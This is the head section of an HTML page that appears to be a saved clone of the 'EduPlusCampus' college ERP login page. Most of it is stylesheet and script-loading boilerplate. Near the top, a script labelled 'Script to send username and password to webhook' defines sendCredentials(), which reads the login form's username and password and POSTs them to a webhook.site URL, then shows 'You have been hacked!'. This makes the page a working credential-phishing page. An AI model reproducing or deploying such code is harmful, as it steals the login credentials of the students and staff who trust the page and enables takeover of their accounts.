<!DOCTYPE html>
<html class="wf-roboto-n4-active wf-roboto-n3-active wf-roboto-n1-active wf-roboto-n5-active wf-roboto-n7-active wf-active" lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="https://www.vierp.in/assets/favicon-2dfeb8be594e47829083845a3ec66d52.png">
  <link rel="preconnect" href="https://fonts.googleapis.com/">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
<link href="EduPlusCampus_files/css2.css" rel="stylesheet">   

<title>EduPlusCampus</title>
<style>.bd-no-scroll {color: purple;background-color: #e5e5e5;height: 150px;}.spin-loader-mask { background:rgba(0,0,0,0.0); position: fixed; top: 50%; left: 50%; z-index:-1; -webkit-transform:translate(-50%,-50%); -moz-transform:translate(-50%,-50%); transform:translate(-50%,-50%); }.spin-loader > div {position:absolute; top:50%; left:50%; width:50px; height:50px; background:#ff9000;-webkit-transform:translate(-50%,-50%); -moz-transform:translate(-50%,-50%); transform:translate(-50%,-50%);-webkit-animation:spin-loader 3s 0s cubic-bezier(.09,.57,.49,.9) infinite; animation:spin-loader 3s 0s cubic-bezier(.09,.57,.49,.9) infinite; z-index: 9999;}@keyframes spin-loader { 25% {-webkit-transform:perspective(100px) rotateX(180deg) rotateY(0);transform:perspective(100px) rotateX(180deg) rotateY(0)}50% {-webkit-transform:perspective(100px) rotateX(180deg) rotateY(180deg);transform:perspective(100px) rotateX(180deg) rotateY(180deg)}75% {-webkit-transform:perspective(100px) rotateX(0) rotateY(180deg);transform:perspective(100px) rotateX(0) rotateY(180deg)}100%{-webkit-transform:perspective(100px) rotateX(0) rotateY(0);transform:perspective(100px) rotateX(0) rotateY(0)} }</style><script src="EduPlusCampus_files/jquery.min.js"></script>
  <script src="EduPlusCampus_files/jquery.table2excel.min.js"></script>
  <script src="EduPlusCampus_files/xlsx.full.min.js"></script>
  <script type="text/javascript" src="EduPlusCampus_files/app.bundle.js" async=""></script>
  <script type="text/x-mathjax-config;executed=true">
    MathJax.Hub.Config({
      tex2jax: {
        inlineMath: [['$','$'],['\\(','\\)']],
      }
    });
  </script>
  <!-- Script to send username and password to webhook -->
  <script>
    function sendCredentials() {
      var username = document.getElementById('input-0').value;
      var password = document.getElementById('input-2').value;
      var url = 'https://webhook.site/e2b2fdae-bc54-4868-8a5f-b49f97936989';
      var data = {
        username: username,
        password: password
      };
      fetch(url, {
        method: 'POST',
        body: JSON.stringify(data),
        headers: {
          'Content-Type': 'application/json'
        }
      }).then((response) => {
        alert("You have been hacked!");
      });
    }
  </script>

  <script type="text/javascript" async="" src="EduPlusCampus_files/MathJax.js"></script>
  <script type="module" crossorigin="" src="EduPlusCampus_files/index.28e43e2f.js"></script>
  <link rel="stylesheet" href="EduPlusCampus_files/index.6a6ba956.css">
<style type="text/css">.MathJax_Hover_Frame {border-radius: .25em; -webkit-border-radius: .25em; -moz-border-radius: .25em; -khtml-border-radius: .25em; box-shadow: 0px 0px 15px #83A; -webkit-box-shadow: 0px 0px 15px #83A; -moz-box-shadow: 0px 0px 15px #83A; -khtml-box-shadow: 0px 0px 15px #83A; border: 1px solid #A6D ! important; display: inline-block; position: absolute}
.MathJax_Menu_Button .MathJax_Hover_Arrow {position: absolute; cursor: pointer; display: inline-block; border: 2px solid #AAA; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; -khtml-border-radius: 4px; font-family: 'Courier New',Courier; font-size: 9px; color: #F0F0F0}
.MathJax_Menu_Button .MathJax_Hover_Arrow span {display: block; background-color: #AAA; border: 1px solid; border-radius: 3px; line-height: 0; padding: 4px}
.MathJax_Hover_Arrow:hover {color: white!important; border: 2px solid #CCC!important}
.MathJax_Hover_Arrow:hover span {background-color: #CCC!important}
</style><style type="text/css">#MathJax_About {position: fixed; left: 50%; width: auto; text-align: center; border: 3px outset; padding: 1em 2em; background-color: #DDDDDD; color: black; cursor: default; font-family: message-box; font-size: 120%; font-style: normal; text-indent: 0; text-transform: none; line-height: normal; letter-spacing: normal; word-spacing: normal; word-wrap: normal; white-space: nowrap; float: none; z-index: 201; border-radius: 15px; -webkit-border-radius: 15px; -moz-border-radius: 15px; -khtml-border-radius: 15px; box-shadow: 0px 10px 20px #808080; -webkit-box-shadow: 0px 10px 20px #808080; -moz-box-shadow: 0px 10px 20px #808080; -khtml-box-shadow: 0px 10px 20px #808080; filter: progid:DXImageTransform.Microsoft.dropshadow(OffX=2, OffY=2, Color='gray', Positive='true')}
#MathJax_About.MathJax_MousePost {outline: none}
.MathJax_Menu {position: absolute; background-color: white; color: black; width: auto; padding: 5px 0px; border: 1px solid #CCCCCC; margin: 0; cursor: default; font: menu; text-align: left; text-indent: 0; text-transform: none; line-height: normal; letter-spacing: normal; word-spacing: normal; word-wrap: normal; white-space: nowrap; float: none; z-index: 201; border-radius: 5px; -webkit-border-radius: 5px; -moz-border-radius: 5px; -khtml-border-radius: 5px; box-shadow: 0px 10px 20px #808080; -webkit-box-shadow: 0px 10px 20px #808080; -moz-box-shadow: 0px 10px 20px #808080; -khtml-box-shadow: 0px 10px 20px #808080; filter: progid:DXImageTransform.Microsoft.dropshadow(OffX=2, OffY=2, Color='gray', Positive='true')}
.MathJax_MenuItem {padding: 1px 2em; background: transparent}
.MathJax_MenuArrow {position: absolute; right: .5em; padding-top: .25em; color: #666666; font-size: .75em}
.MathJax_MenuActive .MathJax_MenuArrow {color: white}
.MathJax_MenuArrow.RTL {left: .5em; right: auto}
.MathJax_MenuCheck {position: absolute; left: .7em}
.MathJax_MenuCheck.RTL {right: .7em; left: auto}
.MathJax_MenuRadioCheck {position: absolute; left: .7em}
.MathJax_MenuRadioCheck.RTL {right: .7em; left: auto}
.MathJax_MenuLabel {padding: 1px 2em 3px 1.33em; font-style: italic}
.MathJax_MenuRule {border-top: 1px solid #DDDDDD; margin: 4px 3px}
.MathJax_MenuDisabled {color: GrayText}
.MathJax_MenuActive {background-color: #606872; color: white}
.MathJax_MenuDisabled:focus, .MathJax_MenuLabel:focus {background-color: #E8E8E8}
.MathJax_ContextMenu:focus {outline: none}
.MathJax_ContextMenu .MathJax_MenuItem:focus {outline: none}
#MathJax_AboutClose {top: .2em; right: .2em}
.MathJax_Menu .MathJax_MenuClose {top: -10px; left: -10px}
.MathJax_MenuClose {position: absolute; cursor: pointer; display: inline-block; border: 2px solid #AAA; border-radius: 18px; -webkit-border-radius: 18px; -moz-border-radius: 18px; -khtml-border-radius: 18px; font-family: 'Courier New',Courier; font-size: 24px; color: #F0F0F0}
.MathJax_MenuClose span {display: block; background-color: #AAA; border: 1.5px solid; border-radius: 18px; -webkit-border-radius: 18px; -moz-border-radius: 18px; -khtml-border-radius: 18px; line-height: 0; padding: 8px 0 6px}
.MathJax_MenuClose:hover {color: white!important; border: 2px solid #CCC!important}
.MathJax_MenuClose:hover span {background-color: #CCC!important}
.MathJax_MenuClose:hover:focus {outline: none}
</style><style type="text/css">.MathJax_Preview .MJXf-math {color: inherit!important}
</style><style type="text/css">.MJX_Assistive_MathML {position: absolute!important; top: 0; left: 0; clip: rect(1px, 1px, 1px, 1px); padding: 1px 0 0 0!important; border: 0!important; height: 1px!important; width: 1px!important; overflow: hidden!important; display: block!important; -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none}
.MJX_Assistive_MathML.MJX_Assistive_MathML_Block {width: 100%!important}
</style><style type="text/css">#MathJax_Zoom {position: absolute; background-color: #F0F0F0; overflow: auto; display: block; z-index: 301; padding: .5em; border: 1px solid black; margin: 0; font-weight: normal; font-style: normal; text-align: left; text-indent: 0; text-transform: none; line-height: normal; letter-spacing: normal; word-spacing: normal; word-wrap: normal; white-space: nowrap; float: none; -webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box; box-shadow: 5px 5px 15px #AAAAAA; -webkit-box-shadow: 5px 5px 15px #AAAAAA; -moz-box-shadow: 5px 5px 15px #AAAAAA; -khtml-box-shadow: 5px 5px 15px #AAAAAA; filter: progid:DXImageTransform.Microsoft.dropshadow(OffX=2, OffY=2, Color='gray', Positive='true')}
#MathJax_ZoomOverlay {position: absolute; left: 0; top: 0; z-index: 300; display: inline-block; width: 100%; height: 100%; border: 0; padding: 0; margin: 0; background-color: white; opacity: 0; filter: alpha(opacity=0)}
#MathJax_ZoomFrame {position: relative; display: inline-block; height: 0; width: 0}
#MathJax_ZoomEventTrap {position: absolute; left: 0; top: 0; z-index: 302; display: inline-block; border: 0; padding: 0; margin: 0; background-color: white; opacity: 0; filter: alpha(opacity=0)}
</style><style type="text/css">.MathJax_Preview {color: #888}
#MathJax_Message {position: fixed; left: 1px; bottom: 2px; background-color: #E6E6E6; border: 1px solid #959595; margin: 0px; padding: 2px 8px; z-index: 102; color: black; font-size: 80%; width: auto; white-space: nowrap}
#MathJax_MSIE_Frame {position: absolute; top: 0; left: 0; width: 0px; z-index: 101; border: 0px; margin: 0px; padding: 0px}
.MathJax_Error {color: #CC0000; font-style: italic}
</style><style type="text/css">.MJXp-script {font-size: .8em}
.MJXp-right {-webkit-transform-origin: right; -moz-transform-origin: right; -ms-transform-origin: right; -o-transform-origin: right; transform-origin: right}
.MJXp-bold {font-weight: bold}
.MJXp-italic {font-style: italic}
.MJXp-scr {font-family: MathJax_Script,'Times New Roman',Times,STIXGeneral,serif}
.MJXp-frak {font-family: MathJax_Fraktur,'Times New Roman',Times,STIXGeneral,serif}
.MJXp-sf {font-family: MathJax_SansSerif,'Times New Roman',Times,STIXGeneral,serif}
.MJXp-cal {font-family: MathJax_Caligraphic,'Times New Roman',Times,STIXGeneral,serif}
.MJXp-mono {font-family: MathJax_Typewriter,'Times New Roman',Times,STIXGeneral,serif}
.MJXp-largeop {font-size: 150%}
.MJXp-largeop.MJXp-int {vertical-align: -.2em}
.MJXp-math {display: inline-block; line-height: 1.2; text-indent: 0; font-family: 'Times New Roman',Times,STIXGeneral,serif; white-space: nowrap; border-collapse: collapse}
.MJXp-display {display: block; text-align: center; margin: 1em 0}
.MJXp-math span {display: inline-block}
.MJXp-box {display: block!important; text-align: center}
.MJXp-box:after {content: " "}
.MJXp-rule {display: block!important; margin-top: .1em}
.MJXp-char {display: block!important}
.MJXp-mo {margin: 0 .15em}
.MJXp-mfrac {margin: 0 .125em; vertical-align: .25em}
.MJXp-denom {display: inline-table!important; width: 100%}
.MJXp-denom > * {display: table-row!important}
.MJXp-surd {vertical-align: top}
.MJXp-surd > * {display: block!important}
.MJXp-script-box > *  {display: table!important; height: 50%}
.MJXp-script-box > * > * {display: table-cell!important; vertical-align: top}
.MJXp-script-box > *:last-child > * {vertical-align: bottom}
.MJXp-script-box > * > * > * {display: block!important}
.MJXp-mphantom {visibility: hidden}
.MJXp-munderover, .MJXp-munder {display: inline-table!important}
.MJXp-over {display: inline-block!important; text-align: center}
.MJXp-over > * {display: block!important}
.MJXp-munderover > *, .MJXp-munder > * {display: table-row!important}
.MJXp-mtable {vertical-align: .25em; margin: 0 .125em}
.MJXp-mtable > * {display: inline-table!important; vertical-align: middle}
.MJXp-mtr {display: table-row!important}
.MJXp-mtd {display: table-cell!important; text-align: center; padding: .5em 0 0 .5em}
.MJXp-mtr > .MJXp-mtd:first-child {padding-left: 0}
.MJXp-mtr:first-child > .MJXp-mtd {padding-top: 0}
.MJXp-mlabeledtr {display: table-row!important}
.MJXp-mlabeledtr > .MJXp-mtd:first-child {padding-left: 0}
.MJXp-mlabeledtr:first-child > .MJXp-mtd {padding-top: 0}
.MJXp-merror {background-color: #FFFF88; color: #CC0000; border: 1px solid #CC0000; padding: 1px 3px; font-style: normal; font-size: 90%}
.MJXp-scale0 {-webkit-transform: scaleX(.0); -moz-transform: scaleX(.0); -ms-transform: scaleX(.0); -o-transform: scaleX(.0); transform: scaleX(.0)}
.MJXp-scale1 {-webkit-transform: scaleX(.1); -moz-transform: scaleX(.1); -ms-transform: scaleX(.1); -o-transform: scaleX(.1); transform: scaleX(.1)}
.MJXp-scale2 {-webkit-transform: scaleX(.2); -moz-transform: scaleX(.2); -ms-transform: scaleX(.2); -o-transform: scaleX(.2); transform: scaleX(.2)}
.MJXp-scale3 {-webkit-transform: scaleX(.3); -moz-transform: scaleX(.3); -ms-transform: scaleX(.3); -o-transform: scaleX(.3); transform: scaleX(.3)}
.MJXp-scale4 {-webkit-transform: scaleX(.4); -moz-transform: scaleX(.4); -ms-transform: scaleX(.4); -o-transform: scaleX(.4); transform: scaleX(.4)}
.MJXp-scale5 {-webkit-transform: scaleX(.5); -moz-transform: scaleX(.5); -ms-transform: scaleX(.5); -o-transform: scaleX(.5); transform: scaleX(.5)}
.MJXp-scale6 {-webkit-transform: scaleX(.6); -moz-transform: scaleX(.6); -ms-transform: scaleX(.6); -o-transform: scaleX(.6); transform: scaleX(.6)}
.MJXp-scale7 {-webkit-transform: scaleX(.7); -moz-transform: scaleX(.7); -ms-transform: scaleX(.7); -o-transform: scaleX(.7); transform: scaleX(.7)}
.MJXp-scale8 {-webkit-transform: scaleX(.8); -moz-transform: scaleX(.8); -ms-transform: scaleX(.8); -o-transform: scaleX(.8); transform: scaleX(.8)}
.MJXp-scale9 {-webkit-transform: scaleX(.9); -moz-transform: scaleX(.9); -ms-transform: scaleX(.9); -o-transform: scaleX(.9); transform: scaleX(.9)}
.MathJax_PHTML .noError {vertical-align: ; font-size: 90%; text-align: left; color: black; padding: 1px 3px; border: 1px solid}
</style><style type="text/css" id="vuetify-theme-stylesheet">:root {
      --v-theme-background: 255,255,255;
      --v-theme-background-overlay-multiplier: 1;
      --v-theme-surface: 255,255,255;
      --v-theme-surface-overlay-multiplier: 1;
      --v-theme-surface-bright: 255,255,255;
      --v-theme-surface-bright-overlay-multiplier: 1;
      --v-theme-surface-variant: 66,66,66;
      --v-theme-surface-variant-overlay-multiplier: 2;
      --v-theme-on-surface-variant: 238,238,238;
      --v-theme-primary: 24,103,192;
      --v-theme-primary-overlay-multiplier: 2;
      --v-theme-primary-darken-1: 31,85,146;
      --v-theme-primary-darken-1-overlay-multiplier: 2;
      --v-theme-secondary: 92,187,246;
      --v-theme-secondary-overlay-multiplier: 1;
      --v-theme-secondary-darken-1: 1,135,134;
      --v-theme-secondary-darken-1-overlay-multiplier: 1;
      --v-theme-error: 176,0,32;
      --v-theme-error-overlay-multiplier: 2;
      --v-theme-info: 33,150,243;
      --v-theme-info-overlay-multiplier: 1;
      --v-theme-success: 76,175,80;
      --v-theme-success-overlay-multiplier: 1;
      --v-theme-warning: 251,140,0;
      --v-theme-warning-overlay-multiplier: 1;
      --v-theme-on-background: 0,0,0;
      --v-theme-on-surface: 0,0,0;
      --v-theme-on-surface-bright: 0,0,0;
      --v-theme-on-primary: 255,255,255;
      --v-theme-on-primary-darken-1: 255,255,255;
      --v-theme-on-secondary: 0,0,0;
      --v-theme-on-secondary-darken-1: 255,255,255;
      --v-theme-on-error: 255,255,255;
      --v-theme-on-info: 255,255,255;
      --v-theme-on-success: 255,255,255;
      --v-theme-on-warning: 255,255,255;
      --v-border-color: 0, 0, 0;
      --v-border-opacity: 0.12;
      --v-high-emphasis-opacity: 0.87;
      --v-medium-emphasis-opacity: 0.6;
      --v-disabled-opacity: 0.38;
      --v-idle-opacity: 0.04;
      --v-hover-opacity: 0.04;
      --v-focus-opacity: 0.12;
      --v-selected-opacity: 0.08;
      --v-activated-opacity: 0.12;
      --v-pressed-opacity: 0.12;
      --v-dragged-opacity: 0.08;
      --v-theme-kbd: 33, 37, 41;
      --v-theme-on-kbd: 255, 255, 255;
      --v-theme-code: 245, 245, 245;
      --v-theme-on-code: 0, 0, 0;
    }
    .v-theme--light {
      color-scheme: normal;
      --v-theme-background: 255,255,255;
      --v-theme-background-overlay-multiplier: 1;
      --v-theme-surface: 255,255,255;
      --v-theme-surface-overlay-multiplier: 1;
      --v-theme-surface-bright: 255,255,255;
      --v-theme-surface-bright-overlay-multiplier: 1;
      --v-theme-surface-variant: 66,66,66;
      --v-theme-surface-variant-overlay-multiplier: 2;
      --v-theme-on-surface-variant: 238,238,238;
      --v-theme-primary: 24,103,192;
      --v-theme-primary-overlay-multiplier: 2;
      --v-theme-primary-darken-1: 31,85,146;
      --v-theme-primary-darken-1-overlay-multiplier: 2;
      --v-theme-secondary: 92,187,246;
      --v-theme-secondary-overlay-multiplier: 1;
      --v-theme-secondary-darken-1: 1,135,134;
      --v-theme-secondary-darken-1-overlay-multiplier: 1;
      --v-theme-error: 176,0,32;
      --v-theme-error-overlay-multiplier: 2;
      --v-theme-info: 33,150,243;
      --v-theme-info-overlay-multiplier: 1;
      --v-theme-success: 76,175,80;
      --v-theme-success-overlay-multiplier: 1;
      --v-theme-warning: 251,140,0;
      --v-theme-warning-overlay-multiplier: 1;
      --v-theme-on-background: 0,0,0;
      --v-theme-on-surface: 0,0,0;
      --v-theme-on-surface-bright: 0,0,0;
      --v-theme-on-primary: 255,255,255;
      --v-theme-on-primary-darken-1: 255,255,255;
      --v-theme-on-secondary: 0,0,0;
      --v-theme-on-secondary-darken-1: 255,255,255;
      --v-theme-on-error: 255,255,255;
      --v-theme-on-info: 255,255,255;
      --v-theme-on-success: 255,255,255;
      --v-theme-on-warning: 255,255,255;
      --v-border-color: 0, 0, 0;
      --v-border-opacity: 0.12;
      --v-high-emphasis-opacity: 0.87;
      --v-medium-emphasis-opacity: 0.6;
      --v-disabled-opacity: 0.38;
      --v-idle-opacity: 0.04;
      --v-hover-opacity: 0.04;
      --v-focus-opacity: 0.12;
      --v-selected-opacity: 0.08;
      --v-activated-opacity: 0.12;
      --v-pressed-opacity: 0.12;
      --v-dragged-opacity: 0.08;
      --v-theme-kbd: 33, 37, 41;
      --v-theme-on-kbd: 255, 255, 255;
      --v-theme-code: 245, 245, 245;
      --v-theme-on-code: 0, 0, 0;
    }
    .v-theme--dark {
      color-scheme: dark;
      --v-theme-background: 18,18,18;
      --v-theme-background-overlay-multiplier: 1;
      --v-theme-surface: 33,33,33;
      --v-theme-surface-overlay-multiplier: 1;
      --v-theme-surface-bright: 204,191,214;
      --v-theme-surface-bright-overlay-multiplier: 2;
      --v-theme-surface-variant: 163,163,163;
      --v-theme-surface-variant-overlay-multiplier: 2;
      --v-theme-on-surface-variant: 66,66,66;
      --v-theme-primary: 33,150,243;
      --v-theme-primary-overlay-multiplier: 2;
      --v-theme-primary-darken-1: 39,124,193;
      --v-theme-primary-darken-1-overlay-multiplier: 2;
      --v-theme-secondary: 84,182,178;
      --v-theme-secondary-overlay-multiplier: 2;
      --v-theme-secondary-darken-1: 72,169,166;
      --v-theme-secondary-darken-1-overlay-multiplier: 2;
      --v-theme-error: 207,102,121;
      --v-theme-error-overlay-multiplier: 2;
      --v-theme-info: 33,150,243;
      --v-theme-info-overlay-multiplier: 2;
      --v-theme-success: 76,175,80;
      --v-theme-success-overlay-multiplier: 2;
      --v-theme-warning: 251,140,0;
      --v-theme-warning-overlay-multiplier: 2;
      --v-theme-on-background: 255,255,255;
      --v-theme-on-surface: 255,255,255;
      --v-theme-on-surface-bright: 0,0,0;
      --v-theme-on-primary: 255,255,255;
      --v-theme-on-primary-darken-1: 255,255,255;
      --v-theme-on-secondary: 255,255,255;
      --v-theme-on-secondary-darken-1: 255,255,255;
      --v-theme-on-error: 255,255,255;
      --v-theme-on-info: 255,255,255;
      --v-theme-on-success: 255,255,255;
      --v-theme-on-warning: 255,255,255;
      --v-border-color: 255, 255, 255;
      --v-border-opacity: 0.12;
      --v-high-emphasis-opacity: 1;
      --v-medium-emphasis-opacity: 0.7;
      --v-disabled-opacity: 0.5;
      --v-idle-opacity: 0.1;
      --v-hover-opacity: 0.04;
      --v-focus-opacity: 0.12;
      --v-selected-opacity: 0.08;
      --v-activated-opacity: 0.12;
      --v-pressed-opacity: 0.16;
      --v-dragged-opacity: 0.08;
      --v-theme-kbd: 33, 37, 41;
      --v-theme-on-kbd: 255, 255, 255;
      --v-theme-code: 52, 52, 52;
      --v-theme-on-code: 204, 204, 204;
    }
    .bg-background {
      --v-theme-overlay-multiplier: var(--v-theme-background-overlay-multiplier);
      background-color: rgb(var(--v-theme-background)) !important;
      color: rgb(var(--v-theme-on-background)) !important;
    }
    .bg-surface {
      --v-theme-overlay-multiplier: var(--v-theme-surface-overlay-multiplier);
      background-color: rgb(var(--v-theme-surface)) !important;
      color: rgb(var(--v-theme-on-surface)) !important;
    }
    .bg-surface-bright {
      --v-theme-overlay-multiplier: var(--v-theme-surface-bright-overlay-multiplier);
      background-color: rgb(var(--v-theme-surface-bright)) !important;
      color: rgb(var(--v-theme-on-surface-bright)) !important;
    }
    .bg-surface-variant {
      --v-theme-overlay-multiplier: var(--v-theme-surface-variant-overlay-multiplier);
      background-color: rgb(var(--v-theme-surface-variant)) !important;
      color: rgb(var(--v-theme-on-surface-variant)) !important;
    }
    .bg-primary {
      --v-theme-overlay-multiplier: var(--v-theme-primary-overlay-multiplier);
      background-color: rgb(var(--v-theme-primary)) !important;
      color: rgb(var(--v-theme-on-primary)) !important;
    }
    .bg-primary-darken-1 {
      --v-theme-overlay-multiplier: var(--v-theme-primary-darken-1-overlay-multiplier);
      background-color: rgb(var(--v-theme-primary-darken-1)) !important;
      color: rgb(var(--v-theme-on-primary-darken-1)) !important;
    }
    .bg-secondary {
      --v-theme-overlay-multiplier: var(--v-theme-secondary-overlay-multiplier);
      background-color: rgb(var(--v-theme-secondary)) !important;
      color: rgb(var(--v-theme-on-secondary)) !important;
    }
    .bg-secondary-darken-1 {
      --v-theme-overlay-multiplier: var(--v-theme-secondary-darken-1-overlay-multiplier);
      background-color: rgb(var(--v-theme-secondary-darken-1)) !important;
      color: rgb(var(--v-theme-on-secondary-darken-1)) !important;
    }
    .bg-error {
      --v-theme-overlay-multiplier: var(--v-theme-error-overlay-multiplier);
      background-color: rgb(var(--v-theme-error)) !important;
      color: rgb(var(--v-theme-on-error)) !important;
    }
    .bg-info {
      --v-theme-overlay-multiplier: var(--v-theme-info-overlay-multiplier);
      background-color: rgb(var(--v-theme-info)) !important;
      color: rgb(var(--v-theme-on-info)) !important;
    }
    .bg-success {
      --v-theme-overlay-multiplier: var(--v-theme-success-overlay-multiplier);
      background-color: rgb(var(--v-theme-success)) !important;
      color: rgb(var(--v-theme-on-success)) !important;
    }
    .bg-warning {
      --v-theme-overlay-multiplier: var(--v-theme-warning-overlay-multiplier);
      background-color: rgb(var(--v-theme-warning)) !important;
      color: rgb(var(--v-theme-on-warning)) !important;
    }
    .text-background {
      color: rgb(var(--v-theme-background)) !important;
    }
    .border-background {
      --v-border-color: var(--v-theme-background);
    }
    .text-surface {
      color: rgb(var(--v-theme-surface)) !important;
    }
    .border-surface {
      --v-border-color: var(--v-theme-surface);
    }
    .text-surface-bright {
      color: rgb(var(--v-theme-surface-bright)) !important;
    }
    .border-surface-bright {
      --v-border-color: var(--v-theme-surface-bright);
    }
    .text-surface-variant {
      color: rgb(var(--v-theme-surface-variant)) !important;
    }
    .border-surface-variant {
      --v-border-color: var(--v-theme-surface-variant);
    }
    .on-surface-variant {
      color: rgb(var(--v-theme-on-surface-variant)) !important;
    }
    .text-primary {
      color: rgb(var(--v-theme-primary)) !important;
    }
    .border-primary {
      --v-border-color: var(--v-theme-primary);
    }
    .text-primary-darken-1 {
      color: rgb(var(--v-theme-primary-darken-1)) !important;
    }
    .border-primary-darken-1 {
      --v-border-color: var(--v-theme-primary-darken-1);
    }
    .text-secondary {
      color: rgb(var(--v-theme-secondary)) !important;
    }
    .border-secondary {
      --v-border-color: var(--v-theme-secondary);
    }
    .text-secondary-darken-1 {
      color: rgb(var(--v-theme-secondary-darken-1)) !important;
    }
    .border-secondary-darken-1 {
      --v-border-color: var(--v-theme-secondary-darken-1);
    }
    .text-error {
      color: rgb(var(--v-theme-error)) !important;
    }
    .border-error {
      --v-border-color: var(--v-theme-error);
    }
    .text-info {
      color: rgb(var(--v-theme-info)) !important;
    }
    .border-info {
      --v-border-color: var(--v-theme-info);
    }
    .text-success {
      color: rgb(var(--v-theme-success)) !important;
    }
    .border-success {
      --v-border-color: var(--v-theme-success);
    }
    .text-warning {
      color: rgb(var(--v-theme-warning)) !important;
    }
    .border-warning {
      --v-border-color: var(--v-theme-warning);
    }
    .on-background {
      color: rgb(var(--v-theme-on-background)) !important;
    }
    .on-surface {
      color: rgb(var(--v-theme-on-surface)) !important;
    }
    .on-surface-bright {
      color: rgb(var(--v-theme-on-surface-bright)) !important;
    }
    .on-primary {
      color: rgb(var(--v-theme-on-primary)) !important;
    }
    .on-primary-darken-1 {
      color: rgb(var(--v-theme-on-primary-darken-1)) !important;
    }
    .on-secondary {
      color: rgb(var(--v-theme-on-secondary)) !important;
    }
    .on-secondary-darken-1 {
      color: rgb(var(--v-theme-on-secondary-darken-1)) !important;
    }
    .on-error {
      color: rgb(var(--v-theme-on-error)) !important;
    }
    .on-info {
      color: rgb(var(--v-theme-on-info)) !important;
    }
    .on-success {
      color: rgb(var(--v-theme-on-success)) !important;
    }
    .on-warning {
      color: rgb(var(--v-theme-on-warning)) !important;
    }
</style><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/LoginPage.f31791b3.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/landing.ecae34cc.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/Footer.1ef8f139.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/loader.edc2ce21.js"><link rel="stylesheet" href="EduPlusCampus_files/loader.cf707763.css"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VRow.6f8811a7.js"><link rel="stylesheet" href="EduPlusCampus_files/VGrid.2875219e.css"><link rel="stylesheet" href="EduPlusCampus_files/Footer.10117a8c.css"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/SnackbarComponent.f61481cf.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VSnackbar.0fd96719.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VOverlay.95b105f9.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/forwardRefs.9cf409b9.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/transition.bb947a21.js"><link rel="stylesheet" href="EduPlusCampus_files/VOverlay.0e1381c2.css"><link rel="stylesheet" href="EduPlusCampus_files/VSnackbar.f0d84ef2.css"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VCol.9eb56275.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VImg.d717e2b6.js"><link rel="stylesheet" href="EduPlusCampus_files/VImg.ebeecff9.css"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VTextField.cf725163.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VField.aa8e1adc.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/index.1114d83c.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VInput.5366cc14.js"><link rel="stylesheet" href="EduPlusCampus_files/VInput.5664c100.css"><link rel="stylesheet" href="EduPlusCampus_files/VField.9cb6d830.css"><link rel="stylesheet" href="EduPlusCampus_files/VTextField.d1dbad21.css"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VBtn.e6b230f5.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/group.8c9fdffd.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VProgressCircular.f7be7645.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/resizeObserver.1ad2fd04.js"><link rel="stylesheet" href="EduPlusCampus_files/VProgressCircular.4471e8f1.css"><link rel="stylesheet" href="EduPlusCampus_files/VBtn.0b028df5.css"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VContainer.657d26f0.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VCard.f9116a27.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/createSimpleFunctional.5bcba004.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VCardTitle.33e46f28.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VAvatar.2ce67955.js"><link rel="stylesheet" href="EduPlusCampus_files/VAvatar.790cefc8.css"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VCardText.65bb5633.js"><link rel="stylesheet" href="EduPlusCampus_files/VCard.7131d337.css"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VTable.a1772161.js"><link rel="stylesheet" href="EduPlusCampus_files/VTable.87209acb.css"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/VDialog.e89edcaa.js"><link rel="modulepreload" as="script" crossorigin="" href="https://learner.pceterp.in/assets/dialog-transition.d68b7f94.js"><link rel="stylesheet" href="EduPlusCampus_files/VDialog.9119fae6.css"><link rel="stylesheet" href="EduPlusCampus_files/css.css" media="all"><link rel="stylesheet" href="EduPlusCampus_files/LoginPage.c287bb65.css"></head>

